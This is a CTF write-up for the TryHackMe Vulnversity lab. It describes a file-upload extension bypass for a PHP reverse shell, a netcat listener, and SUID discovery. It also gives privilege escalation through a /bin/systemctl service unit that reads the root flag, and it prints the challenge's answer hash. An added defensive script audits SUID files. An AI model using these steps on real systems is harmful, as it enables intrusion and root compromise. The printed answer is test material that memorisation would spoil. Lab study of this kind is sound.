TryHackMe Vulnversity part-2
CTF Writeup
Hello guys, in this blog we are going to walk through part 2 of Vulnversity.
Let's get into part 2 of the Vulnversity challenge. After finding the /internal directory, there is an option to upload a file. Upload reverse_shell.phtml (change the extension from PHP to PHTML) after editing the file to set your IP and port number.
After uploading the reverse shell, we need to find the page where the file was uploaded, and for that we use gobuster again.
From the screenshot, we can see that /uploads was found.
Then start the listener, i.e. "nc -lvnp port", and click the file that was uploaded on the webserver.
You will get a remote shell by doing this.
After gaining a shell, you need to look for the user flag.
In order to look for SUID files, use the command:
find / -user root -perm -4000 -exec ls -ldb {} \;
Then you will find /bin/systemctl. With the help of GTFOBins, you can exploit /bin/systemctl and get root.
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
This is used to get the flag from root.
ans: a58ff8579f0a9270368d33a9966c7fd5
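The same find command is what a defender would run to catch a stray SUID bit like the one on /bin/systemctl before it gets abused. The script below is an added example, not part of the original writeup: it compares the SUID files found under a directory against a baseline list of expected paths and prints only the unexpected ones. The function names, the baseline file format (one absolute path per line) and the optional owner argument are assumptions made for this example.

```shell
#!/bin/sh
# Added example: baseline audit of set-uid files (defensive check).
# Usage: sh suid_audit.sh SCAN_ROOT BASELINE_FILE [OWNER]
#   BASELINE_FILE holds one expected SUID path per line (assumed format).
#   OWNER defaults to root, matching the find command in the writeup.

# Print every SUID file under SCAN_ROOT that is NOT listed in the baseline.
audit_suid() {
    scan_root=$1
    baseline=$2
    owner=${3:-root}
    # -xdev stays on one filesystem; -perm -4000 selects the set-uid bit.
    find "$scan_root" -xdev -type f -user "$owner" -perm -4000 2>/dev/null \
        | sort \
        | { grep -Fxv -f "$baseline" || true; }   # exact, whole-line match
}

# Print how many unexpected SUID files were found (0 means clean).
count_unexpected() {
    audit_suid "$@" | grep -c . || true
}

# Run only when called with arguments, so the functions can also be sourced.
if [ "$#" -ge 2 ]; then
    unexpected=$(audit_suid "$@")
    if [ -n "$unexpected" ]; then
        echo "Unexpected SUID files (review, then 'chmod u-s' if not needed):"
        echo "$unexpected"
        exit 2
    fi
    echo "No SUID files outside the baseline."
fi
```

On the Vulnversity box, a baseline that lists only the distribution's usual SUID binaries would leave /bin/systemctl in the output, and removing the bit with chmod u-s closes the path used above.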